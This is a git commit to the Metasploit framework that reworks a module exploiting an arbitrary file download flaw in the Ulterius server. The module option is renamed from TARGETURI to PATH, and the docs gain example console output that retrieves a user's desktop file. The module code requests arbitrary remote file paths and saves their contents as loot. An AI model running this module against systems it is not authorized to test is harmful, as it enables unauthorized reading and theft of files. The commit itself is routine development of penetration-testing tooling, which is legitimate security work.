Avoid target_uri.path

It doesn't look like target_uri.path is suitable for this scenario, because it causes our input to be modified and hard to use.
2018-02-15 16:31:09 -06:00 · 2018-02-15 16:31:09 -06:00 · 949b474a0a
parent 5467f4c97e
commit 949b474a0a
2 changed files with 18 additions and 10 deletions
--- a/documentation/modules/auxiliary/admin/http/ulterius_file_download.md
+++ b/documentation/modules/auxiliary/admin/http/ulterius_file_download.md
@ -22,7 +22,7 @@ Note: The [EDB PoC](https://www.exploit-db.com/exploits/43141/) used relative pa

 ## Options

-**TARGETURI**
+**PATH**

 This option specifies the absolute or relative path of the file to download. (default: `/…/fileIndex.db`)

@ -36,7 +36,7 @@ Note: If you are using relative paths, use three periods when traversing down a
 - [ ] `set rhost <rhost>`
 - [ ] `run`
 - [ ] Verify loot contains file system paths from remote file system.
- [ ] `set targeturi '/<DriveLetter>:/<path>/<to>/<file>'`
+- [ ] `set path '<DriveLetter>:/<path>/<to>/<file>'`
 - [ ] `run`
 - [ ] Verify contents of file

@ -53,11 +53,11 @@ msf5 auxiliary(admin/http/ulterius_file_download) > run
 [*] Starting to parse fileIndex.db...
 [*] Remote file paths saved in: filepath0
 [*] Auxiliary module execution completed
-msf5 auxiliary(admin/http/ulterius_file_download) > set targeturi '/C:/users/pwnduser/desktop/tmp.txt'
-targeturi => /C:/users/pwnduser/desktop/tmp.txt
+msf5 auxiliary(admin/http/ulterius_file_download) > set path 'C:/users/pwnduser/desktop/tmp.txt'
+path => C:/users/pwnduser/desktop/tmp.txt
 msf5 auxiliary(admin/http/ulterius_file_download) > run

-[*] /C:/users/pwnduser/desktop/tmp.txt
+[*] C:/users/pwnduser/desktop/tmp.txt
 [*] File contents saved: filepath1
 [*] Auxiliary module execution completed
 msf5 auxiliary(admin/http/ulterius_file_download) >
--- a/modules/auxiliary/admin/http/ulterius_file_download.rb
+++ b/modules/auxiliary/admin/http/ulterius_file_download.rb
@ -35,7 +35,7 @@ class MetasploitModule < Msf::Auxiliary
      register_options(
        [
          Opt::RPORT(22006),
-          OptString.new('TARGETURI', [true, 'Path to the file to download', '/.../fileIndex.db']),
+          OptString.new('PATH', [true, 'Path to the file to download', '/.../fileIndex.db']),
        ])
  end

@ -73,9 +73,16 @@ class MetasploitModule < Msf::Auxiliary
  end

  def run
+    path = datastore['PATH']
+    # Always make sure there is a starting slash so as an user,
+    # we don't need to worry about it.
+    path = "/#{path}" if path && path[0] != '/'
+
+    print_status("Requesting: #{path}")
+
    begin
      res = send_request_cgi({
-        'uri' => normalize_uri(target_uri.path),
+        'uri' => normalize_uri(path),
        'method' => 'GET'
      })
    rescue Rex::ConnectionRefused, Rex::ConnectionTimeout,
@ -83,14 +90,15 @@ class MetasploitModule < Msf::Auxiliary
      vprint_error("Failed: #{e.class} - #{e.message}")
      return
    end
+
    if res && res.code == 200
-      if target_uri.path =~ /fileIndex\.db/i
+      if path =~ /fileIndex\.db/i
        inflate_parse(res.body)
      else
-        print_status(target_uri.path)
-        myloot = store_loot('ulterius.file.download', 'text/plain', datastore['RHOST'], res.body, target_uri.path, 'Remote file system')
+        myloot = store_loot('ulterius.file.download', 'text/plain', datastore['RHOST'], res.body, path, 'Remote file system')
        print_status("File contents saved: #{myloot.to_s}")
      end
    end
  end
+
 end